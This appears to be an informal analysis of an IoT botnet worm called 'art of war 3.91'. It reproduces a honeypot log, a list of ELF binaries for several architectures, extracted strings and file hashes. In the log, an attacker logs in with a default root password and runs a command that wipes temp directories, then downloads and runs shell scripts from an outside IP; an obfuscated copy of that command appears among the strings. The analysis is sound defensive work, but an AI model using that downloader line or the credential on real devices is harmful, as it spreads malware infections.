name of the virus:art of war 3.91 

this is a worm


spreading from:91.185.190.172

info:
anonymous ftp allowed
nginx debian

name:
found the string "art of war":
ARTOF
WAR3.91WAR


log file:
New connection: 197.149.60.96:51509 (192.168.1.5:2223) [session: TT1897]
login attempt [root/xc3511] succeeded
login attempt [root/xc3511] succeeded
Opening TTY Log: log/tty/20160926-185629-None-1897i.log
Opening TTY Log: log/tty/20160926-185629-None-1897i.log
CMD: sh
CMD: sh
Command found: sh
Command found: sh
CMD: shell
CMD: shell
Command not found: shell
Command not found: shell
CMD: rm -f /tmp/* /var/* /var/run/* /var/tmp/*;cd /tmp || cd /var || cd /var/run || cd /var/tmp || cd /dev/shm || cd /dev;busybox wget http://91.185.190.172/bin.sh;sh bin.sh;busybox ftpget -u anonymous -p anonymous 91.185.190.172 bin2.sh bin2.sh;sh bin2.sh;busybox tftp -r bin3.sh -g 91.185.190.172;sh bin3.sh
CMD: rm -f /tmp/* /var/* /var/run/* /var/tmp/*;cd /tmp || cd /var || cd /var/run || cd /var/tmp || cd /dev/shm || cd /dev;busybox wget http://91.185.190.172/bin.sh;sh bin.sh;busybox ftpget -u anonymous -p anonymous 91.185.190.172 bin2.sh bin2.sh;sh bin2.sh;busybox tftp -r bin3.sh -g 91.185.190.172;sh bin3.sh
Command found: sh bin3.sh
Command found: sh bin3.sh
Command found: busybox tftp -r bin3.sh -g 91.185.190.172
Command found: busybox tftp -r bin3.sh -g 91.185.190.172
Command found: sh bin2.sh
Command found: sh bin2.sh
Command found: busybox ftpget -u anonymous -p anonymous 91.185.190.172 bin2.sh bin2.sh
Command found: busybox ftpget -u anonymous -p anonymous 91.185.190.172 bin2.sh bin2.sh
Command found: sh bin.sh
Command found: sh bin.sh
Command found: busybox wget http://91.185.190.172/bin.sh
Command found: busybox wget http://91.185.190.172/bin.sh
Command found: cd /dev
Command found: cd /dev
Command found: cd /dev/shm
Command found: cd /dev/shm
Command found: cd /var/tmp
Command found: cd /var/tmp
Command found: cd /var/run
Command found: cd /var/run
Command found: cd /var
Command found: cd /var
Command found: cd /tmp
Command found: cd /tmp
Command found: rm -f /tmp/* /var/* /var/run/* /var/tmp/*
Command found: rm -f /tmp/* /var/* /var/run/* /var/tmp/*
Command found: wget http://91.185.190.172/bin.sh
Command found: wget http://91.185.190.172/bin.sh
Downloaded URL (http://91.185.190.172/bin.sh) with SHA-256 1c810dd4d792718a7f68e11bdb9fc32596f73c1ae6039ecd2ea1bbf9a8a5ceed to dl/1c810dd4d792718a7f68e11bdb9fc32596f73c1ae6039ecd2ea1bbf9a8a5ceed
connection closed





files:
arm4:         ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
arm5:         ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
arm7:         ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, stripped
m68k:         ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
mips:         ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mipsel:       ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
ppc:          ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, stripped
sh4:          ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
sparc:        ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped


possible orignal source:80.94.81.63 or 4.317.334.359 from strings
in -u /gnk/* /exi/* /exi/ifm/* /exi/gnk/*;yz /gnk || yz /exi || yz /exi/ifm || yz /exi/gnk || yz /zve/hsn || yz /zve;wfhcwla btvg sggk://80.094.081.063/wrm.hs;hs wrm.hs;wfhcwla ugktvg -f xmlmcnlfh -k xmlmcnlfh 80.094.081.063 wrm3.hs wrm3.hs;hs wrm3.hs;wfhcwla gugk -i wrm2.hs -t 80.094.081.063;hs wrm2.hs

some other strings:
INFECT %s:%s:%s
BUILD %s
.shstrtab	reginfo
ittexf
voda#
eh_frame	ctors
djcr
."go5w
com/n
bug.ii32
ARTOF							
WAR3.91WAR						
 !/proc/self/exe7
f?S#
mdebug.ii32
trtab	reginfo
ABCDEFGHIJKLMN
OPQRSTUVZYWXabcdefghijklmnopqrst
uvzywx0123456789:/. ->#$%;|*K
XWYZVUTSRQPONMLKJIHGFEDCBAxwyzv
utsrqponmlkjihgfedcba1032547698a
eh_frame	ctors
KRMT
%d.%d.%d.%d
/proc/scsi/scsi
4.317.334.359
REPORT %s:%s:%s



signatures 
881c4a04670f75ea7a8cc9088bb192a0:838:20160926094818_http___91_185_190_172_bin_sh
1c810dd4d792718a7f68e11bdb9fc32596f73c1ae6039ecd2ea1bbf9a8a5ceed

fe861c10352337e2bb4f1785a45fd494:18620:arm4
0af9e0e3461b805bb34f520cdf85cd6c:18620:arm5
f4f57cbb0171e647eb1e5d29e8b643ca:30820:arm7
3bbec7292a14282521095d2683dc1a6c:37232:m68k
ded865739828a497f6b334a8f69b452f:22056:mips
c86d419d19384bf0d09f562959ebb160:22204:mipsel
2c4287c17be18fbfde7e0264fa56dd83:18172:ppc
b52adf8f24370d0dadf7cb206688af50:29440:sh4
86f759392e1e9e7d15df01d229818e66:38488:sparc
